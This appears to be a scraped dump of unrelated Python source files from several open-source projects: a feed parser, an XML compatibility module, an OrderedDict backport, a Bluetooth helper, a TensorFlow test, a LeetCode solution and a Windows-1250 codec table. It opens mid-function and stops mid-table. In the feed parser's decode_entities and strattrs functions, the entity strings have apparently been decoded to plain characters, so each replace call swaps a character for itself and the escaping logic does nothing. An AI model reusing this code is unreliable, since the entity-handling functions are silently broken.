if len(self.comment) > 0:
HeeksCNC.program.python_program += "comment(" + self.comment + ")\n"
if self.UsesTool():
HeeksCNC.machine_state.AppendToolChangeText(self.tool_number) # Select the correct tool.
|
Vagab0nd/SiCKRAGE
|
refs/heads/master
|
lib3/feedparser/parsers/loose.py
|
3
|
# The loose feed parser that interfaces with an SGML parsing library
# Copyright 2010-2020 Kurt McKee <contactme@kurtmckee.org>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
class _LooseFeedParser(object):
contentparams = None
def __init__(self, baseuri=None, baselang=None, encoding=None, entities=None):
self.baseuri = baseuri or ''
self.lang = baselang or None
self.encoding = encoding or 'utf-8' # character encoding
self.entities = entities or {}
super(_LooseFeedParser, self).__init__()
@staticmethod
def _normalize_attributes(kv):
k = kv[0].lower()
v = k in ('rel', 'type') and kv[1].lower() or kv[1]
# the sgml parser doesn't handle entities in attributes, nor
# does it pass the attribute values through as unicode, while
# strict xml parsers do -- account for this difference
v = v.replace('&', '&')
return k, v
def decode_entities(self, element, data):
data = data.replace('<', '<')
data = data.replace('<', '<')
data = data.replace('<', '<')
data = data.replace('>', '>')
data = data.replace('>', '>')
data = data.replace('>', '>')
data = data.replace('&', '&')
data = data.replace('&', '&')
data = data.replace('"', '"')
data = data.replace('"', '"')
data = data.replace(''', ''')
data = data.replace(''', ''')
if not self.contentparams.get('type', 'xml').endswith('xml'):
data = data.replace('<', '<')
data = data.replace('>', '>')
data = data.replace('&', '&')
data = data.replace('"', '"')
data = data.replace(''', "'")
data = data.replace('/', '/')
data = data.replace('/', '/')
return data
@staticmethod
def strattrs(attrs):
return ''.join(
' %s="%s"' % (n, v.replace('"', '"'))
for n, v in attrs
)
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.7.2/Lib/xml/dom/minicompat.py
|
209
|
"""Python version compatibility support for minidom."""
# This module should only be imported using "import *".
#
# The following names are defined:
#
# NodeList -- lightest possible NodeList implementation
#
# EmptyNodeList -- lightest possible NodeList that is guaranteed to
# remain empty (immutable)
#
# StringTypes -- tuple of defined string types
#
# defproperty -- function used in conjunction with GetattrMagic;
# using these together is needed to make them work
# as efficiently as possible in both Python 2.2+
# and older versions. For example:
#
# class MyClass(GetattrMagic):
# def _get_myattr(self):
# return something
#
# defproperty(MyClass, "myattr",
# "return some value")
#
# For Python 2.2 and newer, this will construct a
# property object on the class, which avoids
# needing to override __getattr__(). It will only
# work for read-only attributes.
#
# For older versions of Python, inheriting from
# GetattrMagic will use the traditional
# __getattr__() hackery to achieve the same effect,
# but less efficiently.
#
# defproperty() should be used for each version of
# the relevant _get_<property>() function.
__all__ = ["NodeList", "EmptyNodeList", "StringTypes", "defproperty"]
import xml.dom
try:
unicode
except NameError:
StringTypes = type(''),
else:
StringTypes = type(''), type(unicode(''))
class NodeList(list):
__slots__ = ()
def item(self, index):
if 0 <= index < len(self):
return self[index]
def _get_length(self):
return len(self)
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def __getstate__(self):
return list(self)
def __setstate__(self, state):
self[:] = state
class EmptyNodeList(tuple):
__slots__ = ()
def __add__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def __radd__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def item(self, index):
return None
def _get_length(self):
return 0
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def defproperty(klass, name, doc):
get = getattr(klass, ("_get_" + name)).im_func
def set(self, value, name=name):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute " + repr(name))
assert not hasattr(klass, "_set_" + name), \
"expected not to find _set_" + name
prop = property(get, set, doc=doc)
setattr(klass, name, prop)
|
Kapeli/PopClip-Extensions
|
refs/heads/master
|
source/OneNote/requests/packages/urllib3/packages/ordered_dict.py
|
2039
|
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
|
maestro-hybrid-cloud/horizon
|
refs/heads/master
|
openstack_dashboard/enabled/_2010_admin_system_panel_group.py
|
42
|
from django.utils.translation import ugettext_lazy as _
# The slug of the panel group to be added to HORIZON_CONFIG. Required.
PANEL_GROUP = 'admin'
# The display name of the PANEL_GROUP. Required.
PANEL_GROUP_NAME = _('System')
# The slug of the dashboard the PANEL_GROUP associated with. Required.
PANEL_GROUP_DASHBOARD = 'admin'
|
henrytao-me/openerp.positionq
|
refs/heads/master
|
openerp/addons/document/odt2txt.py
|
435
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys, zipfile, xml.dom.minidom
import StringIO
class OpenDocumentTextFile :
def __init__ (self, filepath):
zip = zipfile.ZipFile(filepath)
self.content = xml.dom.minidom.parseString(zip.read("content.xml"))
def toString (self):
""" Converts the document to a string. """
buffer = u""
for val in ["text:p", "text:h", "text:list"]:
for paragraph in self.content.getElementsByTagName(val) :
buffer += self.textToString(paragraph) + "\n"
return buffer
def textToString(self, element):
buffer = u""
for node in element.childNodes :
if node.nodeType == xml.dom.Node.TEXT_NODE :
buffer += node.nodeValue
elif node.nodeType == xml.dom.Node.ELEMENT_NODE :
buffer += self.textToString(node)
return buffer
if __name__ == "__main__" :
s =StringIO.StringIO(file(sys.argv[1]).read())
odt = OpenDocumentTextFile(s)
print odt.toString().encode('ascii','replace')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
zidootech/xbmc4zidoo
|
refs/heads/master
|
kodi_14.1_release/tools/EventClients/lib/python/bt/bt.py
|
181
|
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2013 Team XBMC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
BLUEZ=0
try:
import bluetooth
BLUEZ=1
except:
try:
import lightblue
except:
print "ERROR: You need to have either LightBlue or PyBluez installed\n"\
" in order to use this program."
print "- PyBluez (Linux / Windows XP) http://org.csail.mit.edu/pybluez/"
print "- LightBlue (Mac OS X / Linux) http://lightblue.sourceforge.net/"
exit()
def bt_create_socket():
if BLUEZ:
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
else:
sock = lightblue.socket(lightblue.L2CAP)
return sock
def bt_create_rfcomm_socket():
if BLUEZ:
sock = bluetooth.BluetoothSocket( bluetooth.RFCOMM )
sock.bind(("",bluetooth.PORT_ANY))
else:
sock = lightblue.socket(lightblue.RFCOMM)
sock.bind(("",0))
return sock
def bt_discover_devices():
if BLUEZ:
nearby = bluetooth.discover_devices()
else:
nearby = lightblue.finddevices()
return nearby
def bt_lookup_name(bdaddr):
if BLUEZ:
bname = bluetooth.lookup_name( bdaddr )
else:
bname = bdaddr[1]
return bname
def bt_lookup_addr(bdaddr):
if BLUEZ:
return bdaddr
else:
return bdaddr[0]
def bt_advertise(name, uuid, socket):
if BLUEZ:
bluetooth.advertise_service( socket, name,
service_id = uuid,
service_classes = [ uuid, bluetooth.SERIAL_PORT_CLASS ],
profiles = [ bluetooth.SERIAL_PORT_PROFILE ] )
else:
lightblue.advertise(name, socket, lightblue.RFCOMM)
def bt_stop_advertising(socket):
if BLUEZ:
stop_advertising(socket)
else:
lightblue.stopadvertise(socket)
|
jhaux/tensorflow
|
refs/heads/master
|
tensorflow/tools/graph_transforms/python/transform_graph_test.py
|
169
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for StatSummarizer Python wrapper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import test
from tensorflow.tools.graph_transforms import TransformGraph
class TransformGraphTest(test.TestCase):
# This test constructs a graph with a relu op that's not used by the normal
# inference path, and then tests that the strip_unused transform removes it as
# expected.
def testTransformGraph(self):
input_graph_def = graph_pb2.GraphDef()
const_op1 = input_graph_def.node.add()
const_op1.op = "Const"
const_op1.name = "const_op1"
const_op1.attr["dtype"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
const_op1.attr["value"].CopyFrom(
attr_value_pb2.AttrValue(tensor=tensor_util.make_tensor_proto(
[1, 2], dtypes.float32, [1, 2])))
const_op2 = input_graph_def.node.add()
const_op2.op = "Const"
const_op2.name = "const_op2"
const_op2.attr["dtype"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
const_op2.attr["value"].CopyFrom(
attr_value_pb2.AttrValue(tensor=tensor_util.make_tensor_proto(
[3, 4], dtypes.float32, [1, 2])))
# Create an add that has two constants as inputs.
add_op = input_graph_def.node.add()
add_op.op = "Add"
add_op.attr["T"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
add_op.name = "add_op"
add_op.input.extend(["const_op1", "const_op2"])
# Create a relu that reads from the add.
relu_op = input_graph_def.node.add()
relu_op.op = "Relu"
relu_op.attr["T"].CopyFrom(attr_value_pb2.AttrValue(
type=dtypes.float32.as_datatype_enum))
relu_op.name = "relu_op"
relu_op.input.extend(["add_op"])
# We're specifying that add_op is the final output, and so the relu isn't
# needed.
input_names = []
output_names = ["add_op"]
transforms = ["strip_unused_nodes"]
transformed_graph_def = TransformGraph(input_graph_def, input_names,
output_names, transforms)
# We expect that the relu is no longer present after running the transform.
for node in transformed_graph_def.node:
self.assertNotEqual("Relu", node.op)
if __name__ == "__main__":
test.main()
|
quietcoolwu/leetcode-python
|
refs/heads/master
|
add_binary/solution2.py
|
6
|
class Solution:
# @param a, a string
# @param b, a string
# @return a string
def addBinary(self, a, b):
list_a = [int(i) for i in a[::-1]]
list_b = [int(i) for i in b[::-1]]
la = len(list_a)
lb = len(list_b)
# Pad zeroes
if la < lb:
list_a += [0 for i in range(lb - la)]
la = len(list_a)
else:
list_b += [0 for i in range(la - lb)]
lb = len(list_b)
carry = 0
res = []
for i in range(la):
t = (list_a[i] + list_b[i] + carry) % 2
carry = (list_a[i] + list_b[i] + carry) / 2
res.append(t)
if carry == 1:
res.append(1)
return ''.join([str(d) for d in res[::-1]])
|
vlachoudis/sl4a
|
refs/heads/master
|
python/src/Lib/encodings/cp1250.py
|
593
|
""" Python Character Mapping Codec cp1250 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1250.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp1250',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u20ac' # 0x80 -> EURO SIGN
u'\ufffe' # 0x81 -> UNDEFINED
u'\u201a' # 0x82 -> SINGLE LOW-9 QUOTATION MARK
u'\ufffe' # 0x83 -> UNDEFINED
u'\u201e' # 0x84 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2026' # 0x85 -> HORIZONTAL ELLIPSIS
u'\u2020' # 0x86 -> DAGGER
u'\u2021' # 0x87 -> DOUBLE DAGGER
u'\ufffe' # 0x88 -> UNDEFINED
u'\u2030' # 0x89 -> PER MILLE SIGN
u'\u0160' # 0x8A -> LATIN CAPITAL LETTER S WITH CARON
u'\u2039' # 0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\u015a' # 0x8C -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u0164' # 0x8D -> LATIN CAPITAL LETTER T WITH CARON
u'\u017d' # 0x8E -> LATIN CAPITAL LETTER Z WITH CARON
u'\u0179' # 0x8F -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\ufffe' # 0x90 -> UNDEFINED
u'\u2018' # 0x91 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0x92 -> RIGHT SINGLE QUOTATION MARK
u'\u201c' # 0x93 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0x94 -> RIGHT DOUBLE QUOTATION MARK
u'\u2022' # 0x95 -> BULLET
u'\u2013' # 0x96 -> EN DASH
u'\u2014' # 0x97 -> EM DASH
u'\ufffe' # 0x98 -> UNDEFINED
u'\u2122' # 0x99 -> TRADE MARK SIGN
u'\u0161' # 0x9A -> LATIN SMALL LETTER S WITH CARON
u'\u203a' # 0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\u015b' # 0x9C -> LATIN SMALL LETTER S WITH ACUTE
u'\u0165' # 0x9D -> LATIN SMALL LETTER T WITH CARON
u'\u017e' # 0x9E -> LATIN SMALL LETTER Z WITH CARON
u'\u017a' # 0x9F -> LATIN SMALL LETTER Z WITH ACUTE
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u02c7' # 0xA1 -> CARON
u'\u02d8' # 0xA2 -> BREVE
u'\u0141' # 0xA3 -> LATIN CAPITAL LETTER L WITH STROKE
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\u0104' # 0xA5 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u02db' # 0xB2 -> OGONEK
u'\u0142' # 0xB3 -> LATIN SMALL LETTER L WITH STROKE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\u0105' # 0xB9 -> LATIN SMALL LETTER A WITH OGONEK
